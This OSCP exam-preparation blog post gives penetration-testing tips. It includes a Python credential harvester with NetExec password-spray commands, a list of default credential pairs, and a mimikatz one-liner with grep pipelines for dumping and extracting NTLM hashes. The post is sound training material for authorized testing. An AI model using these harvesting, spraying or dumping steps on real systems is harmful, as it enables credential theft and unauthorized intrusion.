Preparing for the OSCP: Some Tips and Insights
The OSCP exam is notorious for its difficulty, requiring not just technical knowledge but also a strategic approach to hacking under pressure. Here are some tips and tricks that will help you conquer the 24-hour exam and earn your OSCP cert.
Enumeration is key
The most important part is thorough enumeration. Enumerate every service on each machine. If you do not find a lead, reset the machine and enumerate again. Once you have an initial foothold and find yourself in a new environment with potentially new privileges, keep enumerating: it is a cyclical process. Do not skip this step, or you will miss important information. Dig further: check logs, configuration files and the users' home directories for sensitive information. Look for hidden folders (e.g., .git, .svn), examine the PowerShell history (ConsoleHost_history.txt in each user's PSReadLine folder under AppData) and take note of every username and password you come across. Credentials are commonly reused, so spray them across the network and against different protocols (e.g., SMB, WinRM, RDP, SSH, etc.).
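The credential hunting and spraying just described, as an added example that is not from the original post: a small Python loot scanner that runs the usual patterns (net use, ConvertTo-SecureString, PSCredential, key = value entries in config files, user:secret@ URLs) over a set of files, then builds the user and password lists and the NetExec (nxc) spray commands for each protocol. The sample file contents are constructed, the regexes are heuristics that you should extend as you meet new formats, and the nxc command syntax is this example's assumption, not something the post states; the commands are returned for review rather than executed.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample loot (not real files): a PowerShell history file, a web
# application config and a git config, as found during post-foothold enumeration.
SAMPLE_FILES: Dict[str, str] = {
    r"C:\Users\bob\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt": (
        "dir\n"
        r"net use Z: \\fs01\backup Summer2024! /user:CORP\bob" "\n"
        "$p = ConvertTo-SecureString 'Backup#99' -AsPlainText -Force\n"
        r"$c = New-Object System.Management.Automation.PSCredential('CORP\svc_backup', $p)" "\n"
        "Invoke-Command -ComputerName db01 -Credential $c -ScriptBlock { hostname }\n"
    ),
    "/var/www/html/config.php": "<?php\n$db_user = 'webapp';\n$db_pass = 'W3b@pp2024';\n",
    "/home/dev/.git/config": '[remote "origin"]\n\turl = https://dev:gitT0ken!@git.internal/app.git\n',
}

# Heuristic patterns; each yields a user, a secret, or both (named groups).
PATTERNS: List[Tuple[str, re.Pattern]] = [
    # net use \\srv\share /user:DOMAIN\user PASSWORD
    ("net use", re.compile(r"\bnet\s+use\b.*?/user:(?P<user>\S+)\s+(?P<secret>[^\s/*]\S*)", re.I)),
    # net use [X:] \\srv\share PASSWORD /user:DOMAIN\user
    ("net use", re.compile(r"\bnet\s+use\b.*?\\\\\S+\s+(?P<secret>[^\s/\\*]\S*)\s+/user:(?P<user>\S+)", re.I)),
    # ConvertTo-SecureString 'plaintext' -AsPlainText
    ("securestring", re.compile(r"ConvertTo-SecureString\s+['\"]?(?P<secret>[^'\"\s]+)['\"]?\s+-AsPlainText", re.I)),
    # New-Object ...PSCredential('DOMAIN\user', $pass)
    ("pscredential", re.compile(r"PSCredential\s*\(\s*['\"](?P<user>[^'\"]+)['\"]", re.I)),
    # key = value lines in config files ($db_pass = '...', password: ..., DB_PASSWORD=...)
    ("config", re.compile(r"^\s*\$?(?:\w+[_.])?(?:password|passwd|pass|pwd|secret)\s*[=:]\s*['\"]?(?P<secret>[^'\"\s;,]+)", re.I)),
    ("config", re.compile(r"^\s*\$?(?:\w+[_.])?(?:username|user|login)\s*[=:]\s*['\"]?(?P<user>[^'\"\s;,]+)", re.I)),
    # scheme://user:secret@host (git remotes, connection strings)
    ("url", re.compile(r"\w+://(?P<user>[^:/\s@]+):(?P<secret>[^@\s]+)@")),
]


@dataclass(frozen=True)
class Finding:
    path: str
    line_no: int
    kind: str
    user: Optional[str]
    secret: Optional[str]


def scan_files(files: Dict[str, str]) -> List[Finding]:
    """Run every pattern over every line; one Finding per match."""
    findings: List[Finding] = []
    for path, content in files.items():
        for line_no, line in enumerate(content.splitlines(), 1):
            for kind, rx in PATTERNS:
                m = rx.search(line)
                if m:
                    g = m.groupdict()
                    findings.append(Finding(path, line_no, kind, g.get("user"), g.get("secret")))
    return findings


def spray_lists(findings: List[Finding]) -> Tuple[List[str], List[str]]:
    """Unique users (domain prefix / UPN suffix stripped) and unique secrets, for spraying."""
    users, secrets = set(), set()
    for f in findings:
        if f.user:
            users.add(f.user.split("\\")[-1].split("@")[0])
        if f.secret:
            secrets.add(f.secret)
    return sorted(users), sorted(secrets)


def spray_commands(target: str, users_file: str = "users.txt", passwords_file: str = "passwords.txt",
                   protocols: Tuple[str, ...] = ("smb", "winrm", "rdp", "ssh")) -> List[str]:
    """Assumes NetExec's CLI (nxc <proto> <target> -u <file> -p <file>); returned, not executed."""
    return [f"nxc {p} {target} -u {users_file} -p {passwords_file} --continue-on-success"
            for p in protocols]


if __name__ == "__main__":
    found = scan_files(SAMPLE_FILES)
    for f in found:
        print(f"{f.path}:{f.line_no} [{f.kind}] user={f.user!r} secret={f.secret!r}")
    users, secrets = spray_lists(found)
    print("users:", users)
    print("secrets:", secrets)
    for cmd in spray_commands("10.10.10.0/24"):   # target range is a placeholder
        print(cmd)
```

On a real engagement replace SAMPLE_FILES with the contents of the history and config files you pulled from the box, write the two lists to users.txt and passwords.txt, and only then run the printed commands; a wrong regex on a production config produces junk passwords, which is harmless, but spraying junk against a domain with a lockout policy is not.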
Exploitation
https://book.hacktricks.xyz/ is a valuable resource for every pentester and ethical hacker. It offers detailed guides and cheat sheets on a wide array of attack vectors and techniques for exploiting vulnerabilities.
- FTP, SMB, RDP, etc.
- Privilege Escalation (Windows and Linux)
- SQL Injection, XSS, SSRF, and more.
- Post Exploitation
Study each service you encounter during your OSCP prep. Make notes for each service and know how they work and how to exploit them.
Documentation
Document every step you take during the exam; it will greatly assist you with your report writing later. As mentioned in my other blog post, I use Obsidian for note-taking, and I love it — it’s an excellent Markdown editor with a user-friendly interface. Its export feature is fantastic and allowed me to produce a comprehensive report in under 4 hours. Most of the notes I made during the pentest were directly copied into the final report.
Report Writing
Use the detailed notes you took during the pentest, along with any proof-of-concept exploit code and screenshots. For each host, explain the vulnerability, how you gained the initial foothold and how you escalated privileges, so that the reader can reproduce the full chain. Identify each vulnerability, suggest a fix and rate its severity. For more guidance on reporting, check out this article by OffSec.
Default credentials
First, determine whether the web application is an off-the-shelf product or a custom build. If it is a known product, look for a login panel and try its default credentials to authenticate, for example:
admin:admin
admin:password
administrator:administrator
administrator:password
user:password
user:user
pi:raspberry
Also check the product's documentation for the default credentials, or search for them:
Google search: <application_name> default credentials
This repo is useful if you are looking for default credential wordlists: https://github.com/ihebski/DefaultCreds-cheat-sheet
Escape the rabbit hole
If you spend more than an hour on a specific attack vector without any progress, you are probably stuck in a rabbit hole. Set a timer, move on and try something different. Do not overcomplicate things, and do not waste time on dead ends.
Mimikatz for the easy win
If you manage to gain local admin access on a Windows machine, dump the SAM database (and the LSA secrets and cached domain logons while you are at it) with mimikatz.exe on the host, or with impacket-secretsdump from Kali.
Note that the shell running mimikatz must be elevated (started as Administrator): because of UAC, a medium-integrity shell of an admin user cannot read the SAM, and privilege::debug and token::elevate will fail.
On a default Kali VM, mimikatz is found at the following path; copy it to your working directory so you can serve it to the target:
cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .
I often encountered an infinite loop if mimikatz is run inside an evil-winrm session.
From an elevated PowerShell prompt, the following one-liner dumps all the required information in one go:
.\mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit" >> mimikatz.txt
The redirected file is usually UTF-16 encoded (PowerShell's redirection writes Unicode; file mimikatz.txt will tell you), so convert it to UTF-8 first and then grep the converted copy for usernames and NTLM hashes:
iconv -f utf-16 -t utf-8 mimikatz.txt > mimikatz-utf8.txt
To extract all users (without machine accounts, which end in $, and the Guest account):
└─$ grep -i "RID" -A 4 mimikatz-utf8.txt | grep "User" | cut -d ":" -f 2 | cut -d " " -f 2 | grep -v '\$' | grep -v "Guest" > users.txt
To extract all NTLM hashes, we can run:
└─$ grep -i "RID" -A 4 mimikatz-utf8.txt | grep "NTLM" | cut -d ':' -f 2 | cut -d " " -f 2 | grep "\S" > hashes.txt
Check that both files have the same number of lines (wc -l users.txt hashes.txt) before pairing them up: an account without an NTLM entry, or one that the filters above drop, shifts the alignment, so when in doubt take the user and the hash from the same RID block rather than from the two lists.